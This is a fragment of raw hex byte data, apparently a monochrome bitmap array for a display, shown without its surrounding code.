0X07,0XFF,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X3F,0XFF,0XFF,0X00,0X00,0X7F,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XC0,0X00,0X1F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X1F,0XFF,0XFE,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF3,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XE0,0X00,0X1F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XF8,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X3F,0XFF,0XFF,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XF8,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF8,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X08,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X7F,0XFF,0XFF,0X80,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,0XFF,0XF8,0X03,0XFF,0XFF,0XFC,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF8,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X38,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0XFF,0XFF,0XFF,0X80,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFC,0X07,0XFF,0XFF,0XFC,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF0,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0XFF,0XFF,0XFF,0XC0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFE,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XF0,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X03,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,0XFF,0X1F,0XFF,0XFF,0XFE,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XF0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X07,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,0XFF,0X3F,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X00,0X00,0X3F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X1F,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X40,0X00,0X3F,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X7F,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X40,0X00,0X3F,0XFF,0XFF,0XFC,0X00,0X00,0X03,0XFF,0XC0,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,
0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X40,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X00,0X03,0XFF,0X80,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,
0XFF,0XFF,0XFF,0XC0,0X00,0X1F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X00,0X03,0XFF,0X80,0X00,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XFF,0X80,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X20,0X01,0XFF,0X80,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XFE,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X1F,0XFF,0XFF,0XFC,0X00,0X20,0X01,0XFF,0X00,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XFC,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,
0XE0,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X20,0X01,0XFF,0X00,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XF8,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,
0XF0,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X30,0X01,0XFF,0X00,0X08,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XE0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,
0XF0,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X30,0X00,0XFF,0X00,0X18,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X1F,
0XFF,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,
0XF0,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X30,0X00,0XFE,0X00,0X18,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,
0XF0,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X30,0X00,0XFE,0X00,0X18,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XFE,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,
0XF8,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X38,0X00,0X7E,0X00,0X38,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XFC,0X00,0X01,0X00,0X0F,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,
0XF8,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X38,0X00,0X7C,0X00,0X38,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XF0,0X00,0X07,0X00,0X0F,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XF8,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X38,0X00,0X7C,0X00,0X38,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XE0,0X00,0X0F,0X00,0X0F,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,
0XFC,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X38,0X00,0X7C,0X00,0X78,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0XC0,0X00,0X1F,0X00,0X0F,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,
0XFC,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X3C,0X00,0X3C,0X00,0X78,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFF,0X00,0X00,0X7F,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,
0XFC,0X00,0X01,0XFF,0XFF,0XF8,0X00,0X3C,0X00,0X38,0X00,0X78,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFE,0X00,0X00,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,
0XFC,0X00,0X01,0XFF,0XFF,0XF8,0X00,0X3C,0X00,0X38,0X00,0XF8,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XFC,0X00,0X01,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X7F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,
0XFE,0X00,0X01,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X38,0X00,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XF0,0X00,0X07,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,
0XFE,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X38,0X00,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XE0,0X00,0X0F,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X0F,
0XFE,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X10,0X01,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0XC0,0X00,0X1F,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X01,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,
0XFE,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3E,0X00,0X10,0X01,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3F,
0X00,0X00,0X7F,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,
0XFF,0X00,0X00,0XFF,0XFF,0XF8,0X00,0X3F,0X00,0X10,0X01,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3E,
0X00,0X00,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,
0XFF,0X00,0X00,0X7F,0XFF,0XF8,0X00,0X3F,0X00,0X10,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X3C,
0X00,0X01,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,
0XFF,0X00,0X00,0X7F,0XFF,0XF8,0X00,0X3F,0X00,0X00,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X30,
0X00,0X07,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,
0XFF,0X80,0X00,0X7F,0XFF,0XF8,0X00,0X3F,0X00,0X00,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X20,
0X00,0X0F,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,
